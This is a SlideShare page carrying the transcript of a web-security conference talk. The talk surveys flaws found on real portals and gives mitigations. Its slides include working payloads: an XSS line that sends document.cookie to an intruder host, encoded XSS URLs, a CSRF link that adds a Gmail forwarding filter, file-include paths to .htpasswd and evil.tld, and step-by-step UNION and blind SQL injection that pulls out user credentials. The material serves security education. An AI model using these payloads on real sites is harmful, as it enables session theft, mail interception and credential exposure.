Your SlideShare is downloading. ×
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Minor Mistakes In Web Portals
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Minor Mistakes In Web Portals

4,383

Published on

Michal Sobiegraj and Borys Lacki

Michal Sobiegraj and Borys Lacki

Published in: Business
1 Comment
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total Views
4,383
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
1
Comments
1
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Minor Mistakes in Web Portals A Real Case Study ;-) Borys Łącki Michał Sobiegraj, CISSP
  • 2.  Why is Web important? M
  • 3.  Web is everywhere M
  • 4.   We spend money  We manage our finances  We earn money  We waste our time M
  • 5.  Internecie traffic http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 6.  2007: Web traffic has finally overtaken P2P M
  • 7.  Web has beaten pr0n! YAY!* * not supported by any research M
  • 8.  HTTP traffic breakdown http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 9.  Number of Internet hosts increases Over 60 mln active hosts (netcraft) M
  • 10.  Web security in a nutshell M
  • 11.  Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (Sans) M
  • 12.  Why?  A really popular medium ($)  Immature technology  Logical errors  Home-made solutions M
  • 13.  Phishing victims in the US 3.6 million of people lost $3.2 billion total (Gartner, http://www.heise-online.pl/news/item/2356/) M
  • 14.  Standard Web application architecture Internet WWW layer (I/O filters) Application layer (business logic) Database server M
  • 15.  Wrong! Internet WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
  • 16. Application Firewall vs. Proper  architecture, coding and SDLC Internet Web Application Firewall Warstwa WWW (filtry wejścia/wyjścia) New functionality Application layer (business logic) Database server M
  • 17.  The right approach Internet Web Application Firewall WWW layer (I/O filters) Application layer New functionality (business logic) Database server M
  • 18.  Most popular attacks  PHP Remote File Include  SQL Injection  Cross-Site Scripting  Cross-site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
  • 19.  Information disclosure B
  • 20.  A funny story ;-) B
  • 21.  More pics hmm… B
  • 22.  B
  • 23.  :-D B
  • 24.  Downloaded… B
  • 25.  Connecting… B
  • 26.  PWND ;-) B
  • 27.  Conclusion? Staying secure requires specific mindset (Paranoia? ;-) B
  • 28.  Client side access control  It’s possible to bypass the interface  Unlike in ATMs Does not work! B
  • 29.  Client side access control  RSS feed name based on user ID server.tld/rss/100_rss.xml server.tld/rss/101_rss.xml server.tld/rss/102_rss.xml  Reading other user’s messages server.tld/index.php?p=ok&action=msgs2&msgs_id=80 server.tld/index.php?p=ok&action=msgs2&msgs_id=81 server.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
  • 30.  Solution: Server side access control B
  • 31.  Cross-Site Scripting (XSS) B
  • 32.  Reflective XSS Server http://server/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Web Intruder Application User …<script>…</script>… exec(…) Data available in the context of the User B
  • 33.  Example XSS code document.write(‘ <img src=„ http://intruder.tld/cookiemonster.gif? ’+escape(document.cookie) +’ ”> ’); B
  • 34.  Content alteration through an XSS attack B
  • 35.  Rebranding through XSS http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117, 109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40, 34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,10 9,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,1 11,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,1 05,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E document.getElementById(quot;logoquot;).innerHTML= quot;<img src='http://www.srv.tld/images/smiley.gif'>quot; M
  • 36.  This is how it looks in the webpage code ... <div id=quot;maincontentquot;> <h2>Results for: <span style=quot;color: #f00;quot;><script>eval(String.fromCharCode(100,111,99,117,109,101 ,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,1 00,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77 ,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,5 8,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,1 12,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,4 6,103,105,102,39,62,34));</script></span></h2> </div> ... M
  • 37.  The code that is to be changed <div id=quot;logoquot;> <div class=quot;logolinkquot;> <a href=quot;http://server.tld/quot;>server.tld</a> </div> ... </div> M
  • 38.  The code in a Web browser M
  • 39.  Final outcome M
  • 40.  Rendered in a browser M
  • 41.  Content change using XSS  Is not permanent  Better code  easier (sic!) An idea: A form that looks just like a legitimate one, but sends input data elsewhere  phishing B
  • 42.  Authentication using cookies POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user B
  • 43.  Impersonating a legitimate user POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Intruder Welcome user B
  • 44.  Session cookie hijacking http://www.server.tld/index.php?p=comm ents&comments_login=smietanka%3Cscri pt%3Edocument.write(document.cookie) %3C/script%3E PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmc md=(none) M
  • 45.  M
  • 46.  M
  • 47.  M
  • 48.  How to send yourself a cookie?  XMLHttpRequest Troublesome across domains  Link img, iframe, location.href, etc. Przykład: <img src=quot;http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7 si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259. 1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D25810204 1%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29 %7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29quot;> B
  • 49.  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (....//  ../), UTF-7 B
  • 50.  http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif> / M
  • 51. http://server.tld/topics/<img  src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif> %2f  / M
  • 52. http://server.tld/topics/<img  src=http:%252f%252fwww.serv.tld%252fimages%252fsmile y.gif> %252f  %2f  / M
  • 53.  B
  • 54.  Stored XSS Server POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Web Application GET /index.php HTTP/1.1 <script>…</script> User …<script>…</script>… Intruder exec(…) Database Data available in the context of the User B
  • 55.  Stored XSS Exploitation?  Permanent content alteration  Easy session ID hijack  CSRF  XSS Proxy  Automated worms - mySpace, Orkut, Nduja, Borys Easy ;] in web portals that allow users to publish their own content: - bidding portals, blogs, web fora, etc B
  • 56.  Session ID hijack B
  • 57.  XSS Worm Web Server Stores the XSS-worm code in their profile Intruder XSS … Intruder User_1 User_2 B
  • 58.  XSS Worm Web Server Stores the XSS-worm code in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… … exec(…) Stores the XSS-worm code in their profile Intruder User_1 XSS User_2 B
  • 59.  XSS Worm Web Server Zapisuje XSS w swoim profilu GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… User_2 … Stores the XSS-worm exec(…) code in their profile Intruder GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Stores the XSS-worm exec(…) User_2 XSS code in their profile B
  • 60.  Nduja – A Cross Domain/Webmail XSS Worm Intruder E-mail E-mail E-mail E-mail Web Web Web Web Server Server Server Server WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
  • 61.  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (.. ..//  ../), UTF-7  Filter or sanitise data stored in and read from a database B
  • 62.  Cross-Site Request Forgery (CSRF) B
  • 63.  CSRF Server http://server.tld/delete.php?id=34 Web Application GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruder delete(id); User … Item deleted! M
  • 64.  Useful in getting to know your users a wee bit better… <img src=”http://nasza- klasa.pl/invite/1?i=1”> (/var/log/apache/fbi_cia_what-not_access.log) B
  • 65.  Gmail message interception (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip art/form-data&_action=https%3A//mail.google.com/mail/h/ wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@maili nator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_atta ch=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Everyone (well almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk) B
  • 66.  What can we do?  POST instead of GET  not very bullet-proof: iframe, javascript  Referrer  not very bullet-proof either: proxy, browsers, header alteration  Additional temporary ID  User ID tied to a long unpredictable key  ID-key association held on the server side  Re-authentication before sensitive operations  An vulnerability-free code!!! B
  • 67.  PHP File Include B
  • 68.  Local file include  Local file snoop (configs)  Arbitrary code execution (If file upload to the server is permitted)  Access to source code <?php if(file_exists(quot;includes/$page.incquot;)) { include quot;includes/$page.incquot;; } else { echo quot;In construction!<BR>quot;; } http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/publi c_html/.htpasswd%00 B
  • 69.  Remote file include (Arbitrary code execution) <?php include($mosConfig_absolute_path.quot;/administrator/components /com_hashcash/config.hashcash.phpquot;); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoS trategy.php'); http://server.tld/components/com_hashcash/server.php?mosConfig_a bsolute_path=http://evil.tld/evil.txt? access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] quot;GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.t xt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.803„ access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] quot;GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/i d.txt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.76quot; B
  • 70.  What can we do?  Harden the application server (e.g. in PHP.ini) allow_url_fopen = Off allow_url_include = Off register_global = Off safe_mode = On register_globals = Off safe_mode_gid = Off display_errors = Off log_errors = On error_log = /var/log/httpd/php_error.log disable_functions = system, shell_exec, exec, passthru  Watch out for some special characters (null byte, etc)  Filter and sanitise (../, UTF, etc)  WAFs: mod_security, Suhosin PHP B
  • 71.  SQL Injection M
  • 72.  SQL Injection Server GET /login.php HTTP/1.1 login=admin&password=1’ or 1=‘1 Web Application Intruder select * from users where login=‘admin’ and pass=‘1’ or 1=‘1’ Welcome admin! $dane = db_exec(„select from users where Database login=‘$login’ and pass=‘$pass’”) if ($dane.count) { print („Welcome $login”) … } else { print („Bye”); exit (0); } M
  • 73. POST http://www.server.tld/index.php?p=priv HTTP/1.1  priv_search=2e332424&cat='quot;1&w_city=quot;'asd&submit=Szukaj M
  • 74. priv_search=&cat=1&w_city=Ca%B3a+Polska' and  1=1#&submit=Szukaj M
  • 75.  priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
  • 76.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
  • 77.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi t=Szukaj M
  • 78.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi t=Szukaj M
  • 79. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_ NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
  • 80. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
  • 81.  Some S E C R E T S slip out ;-) 14831 users already registered (yeah, right ;-) M
  • 82. Another discovery:  There is 1836 bots :-) M
  • 83.  Blind SQL Injection Registration form: B ‘
  • 84.  Blind SQL Injection (experimenting)  1' and 1='0  OK  1' or 1='1  This email is already registered. You need to pick another one  1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  delay  user() == sig@...  1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  no delay B
  • 85.  Products 1-8 of 8 B
  • 86.  Product database for selected category is empty B
  • 87.  Blind SQL Injection • /zgoda.php?id=155765%20AND%20(select%2 0ascii(substring((select%20login%20from%20a dmini%20limit%201,1),1,1)))%3D97 • id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) =ZNAK_ASCII B
  • 88.  Results of a successful blind SQL Injection attack  Delay  Different content  Error message B
  • 89.  What can we do?  Filter and sanitise input data - Characters white-listing - Consistency (IDS, Firewall, Application, Database)  Do not trust user-side filters (selection lists, JavaScript, etc) M
  • 90.  Conclusion M
  • 91.  Web application security is bad Vulnerability-causing mistakes are everywhere* *well, almost everywhere ;-) M
  • 92.  What to do? Be sure to properly sanitise data coming from and being sent to the user  Web Application Firewall (WAF)  IDS White-listing! M
  • 93.  Be aware of potential threats  Listenand ask  Use professional assistance  Perform a cost-benefit analysis every piece of feedback is worth listening M
  • 94.  Use proven solutions • Traditional coding errors got answered by managed code, automatic typing, GC, etc. • Web frameworks help maintain code quality in Web Applications – Assure code quality to some degree – We are not 100% safe » Frameworks are not mature enough » Not everyone knows how to use them properly » Sometimes expanded in a dumb way » Wide exploitation due to mass usage M
  • 95.  Hardening Proper configuration is a key! One application server configuration directive may prevent a vulnerability from being exploited PHP: http://www.sans.org/top20/#s1 M
  • 96.  Think! No technical control will protect you from logical errors M
  • 97. michal@sobiegraj.com b.lacki@logicaltrust.net Questions?

×